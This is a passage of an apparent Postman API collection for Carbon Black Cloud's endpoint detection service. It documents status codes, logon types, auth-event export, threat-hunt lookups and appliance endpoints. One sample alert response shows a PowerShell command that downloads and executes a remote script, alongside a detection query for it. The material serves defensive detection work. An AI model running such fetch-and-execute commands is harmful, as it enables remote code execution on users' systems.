   \"description\": \"The system does not support mirrored volumes.\"\n        },\n        \"c038005c\": {\n            \"code\": \"STATUS_VOLMGR_RAID5_NOT_SUPPORTED\",\n            \"description\": \"The system does not support RAID-5 volumes.\"\n        },\n        \"c03a0014\": {\n            \"code\": \"STATUS_VIRTDISK_PROVIDER_NOT_FOUND\",\n            \"description\": \"A virtual disk support provider for the specified file was not found.\"\n        },\n        \"c03a0015\": {\n            \"code\": \"STATUS_VIRTDISK_NOT_VIRTUAL_DISK\",\n            \"description\": \"The specified disk is not a virtual disk.\"\n        },\n        \"c03a0016\": {\n            \"code\": \"STATUS_VHD_PARENT_VHD_ACCESS_DENIED\",\n            \"description\": \"The chain of virtual hard disks is inaccessible. The process has not been granted access rights to the parent virtual hard disk for the differencing disk.\"\n        },\n        \"c03a0017\": {\n            \"code\": \"STATUS_VHD_CHILD_PARENT_SIZE_MISMATCH\",\n            \"description\": \"The chain of virtual hard disks is corrupted. There is a mismatch in the virtual sizes of the parent virtual hard disk and differencing disk.\"\n        },\n        \"c03a0018\": {\n            \"code\": \"STATUS_VHD_DIFFERENCING_CHAIN_CYCLE_DETECTED\",\n            \"description\": \"The chain of virtual hard disks is corrupted. A differencing disk is indicated in its own parent chain.\"\n        },\n        \"c03a0019\": {\n            \"code\": \"STATUS_VHD_DIFFERENCING_CHAIN_ERROR_IN_PARENT\",\n            \"description\": \"The chain of virtual hard disks is inaccessible. There was an error opening a virtual hard disk further up the chain.\"\n        }\n    },\n    \"logon_type\": {\n        \"0\": {\n            \"title\": \"System\",\n            \"description\": \"Used only by the System account, for example at system startup.\"\n        },\n        \"2\": {\n            \"title\": \"Interactive\",\n            \"description\": \"A user logged on to this computer.\"\n        },\n        \"3\": {\n            \"title\": \"Network\",\n            \"description\": \"A user or computer logged on to this computer from the network.\"\n        },\n        \"4\": {\n            \"title\": \"Batch\",\n            \"description\": \"Batch logon type is used by batch servers, where processes may be executing on behalf of a user without their direct intervention.\"\n        },\n        \"5\": {\n            \"title\": \"Service\",\n            \"description\": \"A service was started by the Service Control Manager.\"\n        },\n        \"7\": {\n            \"title\": \"Unlock\",\n            \"description\": \"This workstation was unlocked.\"\n        },\n        \"8\": {\n            \"title\": \"NetworkCleartext\",\n            \"description\": \"A user logged on to this computer from the network. The users password was passed to the authentication package in its unhashed form. The built-in authentication packages all hash credentials before sending them across the network. The credentials do not traverse the network in plaintext (also called cleartext).\"\n        },\n        \"9\": {\n            \"title\": \"NewCredentials\",\n            \"description\": \"A caller cloned its current token and specified new credentials for outbound connections. The new logon session has the same local identity, but uses different credentials for other network connections.\"\n        },\n        \"10\": {\n            \"title\": \"RemoteInteractive\",\n            \"description\": \"A user logged on to this computer remotely using Terminal Services or Remote Desktop.\"\n        },\n        \"11\": {\n            \"title\": \"CachedInteractive\",\n            \"description\": \"A user logged on to this computer with network credentials that were stored locally on the computer. The domain controller was not contacted to verify the credentials.\"\n        },\n        \"12\": {\n            \"title\": \"CachedRemoteInteractive\",\n            \"description\": \"Same as RemoteInteractive. This is used for internal auditing.\"\n        },\n        \"13\": {\n            \"title\": \"CachedUnlock\",\n            \"description\": \"Workstation logon.\"\n        }\n    },\n    \"auth_event_action\": {\n        \"ACCOUNT_LOCKED\": \"A user account was locked out\",\n        \"LOGOFF_INITIATED\": \"User initiated logoff\",\n        \"LOGOFF_SUCCESS\": \"An account was logged off\",\n        \"LOGON_DISCOVERED\": \"Logon session detected\",\n        \"LOGON_FAILED\": \"An account failed to log on\",\n        \"LOGON_SUCCESS\": \"An account was successfully logged on\",\n        \"PRIVILEGES_GRANTED\": \"Special privileges assigned to new logon\"\n    }\n}"}],"_postman_id":"13407acb-aebd-433b-b436-d06df7d5a070"},{"name":"Export Auth Events Search Results with Jobs Service","id":"afc07246-9c94-4e59-ba60-8951b16133a6","protocolProfileBehavior":{"disableBodyPruning":true,"disabledSystemHeaders":{}},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"AUTH_EVENTS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export","description":"<p>This is a specific example for exporting Observations which uses the generic Jobs Service. The sequence to use the jobs services is</p>\n<ol>\n<li>Start an Export Event Job (this call)</li>\n<li>Check the job has completed with Get Job Progress</li>\n<li>Download the Job Output. The response is a zipped csv file of results.</li>\n</ol>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p>Full documentation is available on the <a href=\"https://developer.carbonblack.com/\">Developer Network</a></p>\n<ul>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a></li>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/#events-search\">Auth Events API</a></li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","start","event_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0f3dff6d-1e49-400f-a382-2cb912e6d001","name":"Export Auth Events Search Results with Jobs Service","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"AUTH_EVENTS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 5731495,\n    \"type\": \"event_export\",\n    \"job_parameters\": {\n        \"job_parameters\": {\n            \"query\": {\n                \"criteria\": {},\n                \"exclusions\": {},\n                \"query\": \"*:*\",\n                \"time_range\": {\n                    \"start\": \"2023-03-26T02:00:00.000Z\",\n                    \"end\": \"2023-03-29T02:06:20.864Z\"\n                },\n                \"rows\": 10000,\n                \"fields\": [\n                    \"*\"\n                ],\n                \"sort\": [\n                    {\n                        \"field\": \"device_timestamp\",\n                        \"order\": \"DESC\"\n                    }\n                ]\n            }\n        },\n        \"process_guid\": null,\n        \"api_resource\": \"AUTH_EVENTS\",\n        \"version\": \"v2\",\n        \"search_id\": null\n    },\n    \"connector_id\": \"12345ABCD\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"CREATED\",\n    \"create_time\": \"2023-03-29T03:22:54.953Z\",\n    \"last_update_time\": \"2023-03-29T03:22:54.954Z\"\n}"}],"_postman_id":"afc07246-9c94-4e59-ba60-8951b16133a6"}],"id":"13b3388c-0ba8-438a-858d-fc6cc0fc7934","description":"<p>Auth Events API provides visibility into authentication events that occur on Windows endpoints. The reporting of Windows authentication events supplements the reporting of process events, which enables the correlation of authentication and process activity and yields more context-rich threat hunting and incident response.</p>\n<p>Auth Events collection is disabled by default and must be enabled for each Policy. Verify that the devices for which Auth Events are required have a policy assigned with Auth Event collection enabled.</p>\n<h4 id=\"use-cases\">Use Cases</h4>\n<ul>\n<li>Search authentication events; successful, failed, remote, elevated privileges</li>\n<li>Group authentication events by type, user, etc</li>\n<li>Understand how a user is moving laterally</li>\n<li>Identify abnormal user logon activity</li>\n</ul>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api/\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields/\">Information on Fields</a></p>\n","_postman_id":"13b3388c-0ba8-438a-858d-fc6cc0fc7934","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Threat Hunt","item":[{"name":"Get Threat Hunt Information","id":"c7f24127-4edd-4159-b4ad-ea1014eca9fd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/mdr/threathuntingview/v1/orgs/{{cb_org_key}}/threathunts/{{cb_threat_hunt_id}}","description":"<p>Use this API to get descriptive information about a threat hunt - targeted investigation - conducted by the MDR team.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.mdr.threathunts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com//reference/carbon-black-cloud/cb-threathunter/latest/threat-hunt-api/\">See Documentation about the APIs</a></p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-fields\">Information on Fields</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["mdr","threathuntingview","v1","orgs","{{cb_org_key}}","threathunts","{{cb_threat_hunt_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0c6a17ac-cf53-48c5-85e6-a5477ae36fde","name":"Get Threat Hunt Information","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/mdr/threathuntingview/v1/orgs/{{cb_org_key}}/threathunts/{{cb_threat_hunt_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 27 Oct 2023 16:09:52 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"355"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"0ff0725d-22c0-4b8f-95ea-a798e544e408\",\n    \"name\": \"GroutLoader Test\",\n    \"description\": \"GroutLoader was discovered by security researches today; it leverages a previously undiscovered 0-day in Microsoft Excel to download & remotely execute malicious powershell. While details of the threat are still emerging, actors appear to be establishing persistence on assets through scheduled tasks.\",\n    \"threat_hunt_status\": \"COMPLETED\",\n    \"created_timestamp\": \"2023-09-20T03:03:13.540Z\",\n    \"time_range\": {\n        \"start\": \"2023-08-20T00:00:00Z\",\n        \"end\": \"2023-09-20T03:03:13.540Z\",\n        \"range\": \"-1M\"\n    }\n}"},{"id":"0c6ab73e-30af-4265-b6fc-584fefa89ea0","name":"Get Alerts related to Threat Hunt","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-14d\"\n    },\n    \"criteria\": {\n        \"threat_hunt_id\": [\n            \"{{cb_threat_hunt_id}}\"\n        ]\n    },\n    \"sort\": [\n        {\n            \"field\": \"backend_timestamp\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 14 Apr 2023 21:48:44 GMT"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Transfer-Encoding","value":"chunked"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"num_available\": 1,\n    \"results\": [\n        {\n            \"org_key\": \"ABCD1234\",\n            \"alert_url\": \"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:afd82593-1388-42dd-aeec-368a3573e91a&orgKey=ABCD1234\",\n            \"id\": \"afd82593-1388-42dd-aeec-368a3573e91a\",\n            \"type\": \"WATCHLIST\",\n            \"backend_timestamp\": \"2023-09-20T03:06:07.545Z\",\n            \"user_update_timestamp\": \"2023-09-22T21:02:38.233Z\",\n            \"backend_update_timestamp\": \"2023-09-20T03:06:07.545Z\",\n            \"detection_timestamp\": \"2023-09-20T03:03:22.069Z\",\n            \"first_event_timestamp\": \"2023-09-11T17:10:39.569Z\",\n            \"last_event_timestamp\": \"2023-09-11T17:10:39.569Z\",\n            \"severity\": 5,\n            \"reason\": \"Process powershell.exe was detected by the report \\\"Execution - Powershell Executing with Invoke-Expression\\\" in watchlist \\\"Managed Detection and Response Intelligence\\\"\",\n            \"reason_code\": \"025d2c1e-2335-3511-87b8-d6d33d4e387c:5d9af405-d0c6-3f66-9361-c2aa0f9b70f8\",\n            \"threat_id\": \"025D2C1E23358511C7B8D6D33D4E387C\",\n            \"primary_event_id\": \"rQkv9WCbSQO8uTLcWFabnw-0\",\n            \"policy_applied\": \"NOT_APPLIED\",\n            \"run_state\": \"RAN\",\n            \"sensor_action\": \"ALLOW\",\n            \"workflow\": {\n                \"change_timestamp\": \"2023-09-20T03:06:07.545Z\",\n                \"changed_by_type\": \"SYSTEM\",\n                \"changed_by\": \"ALERT_CREATION\",\n                \"closure_reason\": \"NO_REASON\",\n                \"status\": \"OPEN\"\n            },\n            \"determination\": {\n                \"change_timestamp\": \"2023-09-20T03:06:07.545Z\",\n                \"value\": \"NONE\",\n                \"changed_by_type\": \"SYSTEM\",\n                \"changed_by\": \"ALERT_CREATION\"\n            },\n            \"tags\": null,\n            \"alert_notes_present\": true,\n            \"threat_notes_present\": false,\n            \"asset_id\": null,\n            \"is_updated\": false,\n            \"device_id\": 12345678,\n            \"device_name\": \"demodevice\",\n            \"device_uem_id\": \"\",\n            \"device_target_value\": \"MEDIUM\",\n            \"device_policy\": \"demopolicy\",\n            \"device_policy_id\": 123123,\n            \"device_os\": \"WINDOWS\",\n            \"device_os_version\": \"Windows 10 x64\",\n            \"device_location\": \"UNKNOWN\",\n            \"device_external_ip\": \"1.2.3.4\",\n            \"device_internal_ip\": \"5.6.7.8\",\n            \"mdr_alert\": true,\n            \"mdr_workflow\": {\n                \"change_timestamp\": \"2023-09-22T21:02:38.233Z\",\n                \"status\": \"TRIAGE_COMPLETE\",\n                \"is_assigned\": true\n            },\n            \"mdr_determination\": {\n                \"change_timestamp\": \"2023-09-22T21:02:38.233Z\",\n                \"value\": \"LIKELY_THREAT\"\n            },\n            \"mdr_alert_notes_present\": true,\n            \"mdr_threat_notes_present\": false,\n            \"report_id\": \"Hf02hPgRSODd1tiEbUnw-FF392B02-C879-4BF5-B21E-7D6F2889BAE6\",\n            \"report_name\": \"Execution - Powershell Executing with Invoke-Expression\",\n            \"report_description\": \"Powershell can be given commands to download arbitrary content from the Internet and execute it. This could be used for persistence or for large-scale attacks.\",\n            \"report_tags\": [\n                \"powershell\",\n                \"script\",\n                \"t1059\",\n                \"iex\",\n                \"attackframework\",\n                \"attack\",\n                \"windows\"\n            ],\n            \"report_link\": \"https://attack.mitre.org/techniques/T1059/001/\",\n            \"ioc_id\": \"FF392B02-C879-4BF5-B21E-7D6F2889BAE6\",\n            \"ioc_hit\": \"(((process_name:powershell.exe AND process_cmdline:iex) NOT process_cmdline:*choco* NOT fileless_scriptload_cmdline:*choco* NOT scriptload_content:*choco*)) -enriched:true\",\n            \"watchlists\": [\n                {\n                    \"id\": \"5A93z6EISzSY8M8AUhzBjg\",\n                    \"name\": \"Managed Detection and Response Intelligence\"\n                }\n            ],\n            \"threat_hunt_id\": \"0ff0725d-22c0-4b8f-95ea-a798e544e408\",\n            \"threat_hunt_name\": \"GroutLoader Test\",\n            \"process_guid\": \"ABCD1234-0120b1e3-00000df0-00000000-1d9e4d2e2e021e8\",\n            \"process_pid\": 3568,\n            \"process_name\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\n            \"process_sha256\": \"b4e7bc24bf3f5c3da2eb6e9ec5ec10f90099defa91b820f2f3fc70dd9e4785c4\",\n            \"process_md5\": \"bcf01e61144d6d6325650134823198b8\",\n            \"process_effective_reputation\": \"LOCAL_WHITE\",\n            \"process_reputation\": \"NOT_LISTED\",\n            \"process_cmdline\": \"powershell.exe  -c \\\"iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/demouser/HelloWorld/master/HelloWorld.ps1'))\\\"\",\n            \"process_username\": \"DO-NOT-UPGRADE-\\\\DEMO\",\n            \"process_issuer\": [\n                \"Microsoft Windows Production PCA 2011\"\n            ],\n            \"process_publisher\": [\n                \"Microsoft Windows\"\n            ],\n            \"parent_guid\": \"ABCD1234-0120b1e3-0000147c-00000000-1d9caea30fd5ae7\",\n            \"parent_pid\": 5244,\n            \"parent_name\": \"c:\\\\windows\\\\system32\\\\cmd.exe\",\n            \"parent_sha256\": \"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450\",\n            \"parent_md5\": \"8a2122e8162dbef04694b9c3e0b6cdee\",\n            \"parent_effective_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"parent_reputation\": \"TRUSTED_WHITE_LIST\",\n            \"parent_cmdline\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\" \",\n            \"parent_username\": \"DO-NOT-UPGRADE-\\\\DEMO\",\n            \"childproc_guid\": \"\",\n            \"childproc_username\": \"\",\n            \"childproc_cmdline\": \"\"\n        }\n    ]\n}"}],"_postman_id":"c7f24127-4edd-4159-b4ad-ea1014eca9fd"}],"id":"57f93b65-69d7-459a-8174-b7154a40e1cd","description":"<p>Use these APIs to get descriptive information about a threat hunt - targeted investigation - conducted by the MDR team.</p>\n","_postman_id":"57f93b65-69d7-459a-8174-b7154a40e1cd","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"9120597f-10d6-42af-8c59-ebcf154e939a","description":"<h2 id=\"enterprise-edr-api\">Enterprise EDR API</h2>\n<p><em>Carbon Black Cloud Enterprise EDR (Endpoint Detection and Response) is the new name for the product formerly called CB ThreatHunter.</em></p>\n<h3 id=\"introduction\">Introduction</h3>\n<p>Enterprise EDR is an advanced threat hunting and incident response solution delivering unfiltered visibility for top security operations centers (SOCs) and incident response (IR) teams. Enterprise EDR is delivered through the Carbon Black Cloud, a next-generation endpoint protection platform that consolidates security in the cloud using a single agent, console and dataset.</p>\n<h3 id=\"getting-started\">Getting Started</h3>\n<p>Partners and customers can now perform any action available in the Enterprise EDR console programmatically via APIs.</p>\n<p>This unlocks a broad set of capabilities that can be automated using our APIs.</p>\n<p>Example Use Cases:</p>\n<ul>\n<li>Export Events</li>\n<li>Export Processes</li>\n<li>Query and filter processes</li>\n<li>Query and filter events</li>\n<li>Feed Operations</li>\n<li>Watchlist Operations</li>\n</ul>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"60676097-9629-47cc-be2f-41868626f2ae"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"45438712-ea61-4ebb-8edb-5655790ed194"}}],"_postman_id":"9120597f-10d6-42af-8c59-ebcf154e939a","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Workload 🗝","item":[{"name":"Appliance Service API","item":[{"name":"Register Appliance","id":"a35e6e70-a059-4484-92a9-7e0a6ff71c02","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_key\": \"<string>\",\n    \"api_id\": \"<string>\",\n    \"name\": \"<string>\",\n    \"version\": \"<string>\",\n    \"plugin_version\": \"<string>\",\n    \"ip_address\": \"<string>\",\n    \"appliance_group_uuid\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/applianceservice/v1/orgs/{{cb_org_key}}/appliances","description":"<p>Register an appliance.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>appliances.registration</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/appliance-service/#register-appliance\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["applianceservice","v1","orgs","{{cb_org_key}}","appliances"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a35e6e70-a059-4484-92a9-7e0a6ff71c02"},{"name":"Update Appliance Info","id":"16df0815-6101-4a63-b6fe-7c59fc331245","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"{\n  \"version\": \"<string>\",\n  \"plugin_version\": \"<string>\",\n  \"appliance_group_uuid\": \"<string>\",\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/applianceservice/v1/orgs/{{cb_org_key}}/appliances/{{cb_wl_appliance_id}}","description":"<p>Update an appliance’s information.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>appliances.registration</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/appliance-service/#update-appliance-info\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["applianceservice","v1","orgs","{{cb_org_key}}","appliances","{{cb_wl_appliance_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"16df0815-6101-4a63-b6fe-7c59fc331245"},{"name":"Get Appliance Health details","id":"49c5ad10-aba1-40c2-9444-128afdbe5f35","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/applianceservice/v1/orgs/{{cb_org_key}}/appliances/{{cb_wl_appliance_id}}/health","description":"<p>Obtain health details of the specified appliance.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>appliances.registration</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/appliance-service/#get-appliance-health-details\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["applianceservice","v1","orgs","{{cb_org_key}}","appliances","{{cb_wl_appliance_id}}","health"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"49c5ad10-aba1-40c2-9444-128afdbe5f35"},{"name":"Post Worker Heartbeat Time Interval","id":"5e46829f-b914-4f0e-9727-1f10f165373d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"appliance_uuid\": \"<string>\",\n  \"appliance_group_uuid\": \"<string>\",\n  \"heartbeat_interval\": \"<integer>\",\n  \"workerType\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/applianceservice/v1/orgs/{{cb_org_key}}/workers/config","description":"<p>Post Worker HeartBeat time interval.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>appliances.registration</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/appliance-service/#post-worker-heartbeat-time-interval\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["applianceservice","v1","orgs","{{cb_org_key}}","workers","config"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"5e46829f-b914-4f0e-9727-1f10f165373d"}],"id":"71a15930-dc4c-455b-ba39-0129024ddecd","description":"<h1 id=\"appliance-service-api\">Appliance Service API</h1>\n<h2 id=\"overview\">Overview</h2>\n<p>This API lets Carbon Black Cloud Workload users query appliance registration details and health status.</p>\n<p>This also allows user to fine tune appliance configurations like heartbeat interval.</p>\n<h3 id=\"requirements\">Requirements</h3>\n<ul>\n<li>Appliance and vSphere configured to communicate with the Carbon Black Cloud see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/installation\">Installation Guide</a> for more information</li>\n<li>Carbon Black Cloud Workload - You must be a Carbon Black Cloud Workload customer</li>\n<li>All API calls require an API key with appropriate permissions see <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/workload-protection/latest/appliance-service/#authentication\">Authentication</a></li>\n</ul>\n","_postman_id":"71a15930-dc4c-455b-ba39-0129024ddecd","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon 